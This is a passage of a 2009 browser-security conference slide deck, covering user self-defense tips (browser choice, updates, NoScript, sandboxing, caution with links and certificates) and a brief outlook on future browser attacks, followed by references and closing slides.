  • 51. Self-Defense 101 51  Know which browser to use  FireFox vs. Internet Explorer FireFox is currently “more secure by design”   Many exploits/attacks written for Internet Explorer  NoScript plug-in for FireFox greatly increases security  Internet Explorer utilizes ActiveX (an old, buggy technology) When Internet Explorer is the only option…  Use it in limited capacity   Navigate only to trusted sites NO browser is 100% safe to use  Overall, FireFox has proven to be more natively secure  12 March 2009
  • 52. Self-Defense 101 52  Always keep yourself up-to-date  Internet Explorer Utilize Microsoft‟s auto-update feature   Visit update.microsoft.com regularly FireFox  Auto-updates (close it out regularly)   Answer YES when asked to update! Pay attention to tech news if you can…  Valuable information on where browser problems exist  12 March 2009
  • 53. Self-Defense 101 53 Use good add-ons  NoScript   FireFox plug-in  Usable security against script-based attacks  Native protection against ClickJacking, other attacks  Requires user intervention and intelligence  CSRF Protector (helps protect against Clickjacking too)  http://www.cs.princeton.edu/~wzeller/csrf/protector/  Others  Many other plug-ins exist • Mostly for FireFox 12 March 2009
  • 54. Self-Defense 101 54 Use a sandbox  Virtual machine for high-security   Build a VMWare throw-away image  No matter how infected, it will always return to safe  Sandbox your browser?  Sandboxie  ForceField from Zone Labs • Run your browser in a “jail” so it can‟t modify your PC • Remove your browser‟s ability to do damage to your PC 12 March 2009
  • 55. Self-Defense 101 55 Stay alert  Always make sure you know what you‟re clicking no   If you don‟t trust it, don‟t click it  Never click links in emails  Remember: nothing is really free  Watch your mouse pointer…  If it turns to an hour-glass for no reason after you visit a site, that my be a sign of something malicious going on  Check SSL certificates  Don‟t just blindly click through error messages 12 March 2009
  • 56. Talk Overview 56 WorldWideWeb Evolved The web browser – past to present Square Browser, Round Hole Applications in a web browser window Pwnag3 – Owning Your Victim Total browser pwnag3 Searching for Hope Can a browser be secure? Self-Defense 101 How to protect yourself and your computer Crystal Ball Looking into the future 12 March 2009
  • 57. Crystal Ball 57  What‟s next in web-browser hacking?  Exposing more broken standards  Exploiting browser compatibility issues  … what else? 12 March 2009
  • 58. Crystal Ball 58 Exploit Standards Exploit Plugins Exploit Browsers Cross-Site Scripting (XSS) 12 March 2009
  • 59. Crystal Ball 59  Browser with no add-ons  Browser with security built-in  NoScript  Pop-up blockers  SSL validation  Session destroyers  Browse monitor  All JavaScript calls  All requests  IPS for the browser 12 March 2009
  • 60. Crystal Ball 60 Exploiting Standards…  Around the industry CA root server MD5SUM collision  Kaminky's DNS vulnerability  RSnake's Clickjacking   Why Hack? Exploit a Standard  Browsers don‟t check for “malice”  Exploiting standards = impossible to “patch”  Good luck writing a signatures  Only fix is rewrite standards… And… remove features?  12 March 2009
  • 61. Crystal Ball 61 Can we make a secure Browser??? 12 March 2009
  • 62. References 62  Pg 28 – IE8  http://blogs.msdn.com/ie/archive/2008/09/02/ie8-security- part-vi-beta-2-update.aspx  Pg 29 – IE8  http://securitylabs.websense.com/content/Blogs/2932.aspx  Pg 42 – Sandboxie  http://www.sandboxie.com/  Pg 42 – ForceField  http://www.zonealarm.com/security/en-us/home.htm 12 March 2009
  • 63. How To Find Us 63 12 March 2009
  • 64. Questions? 64 12 March 2009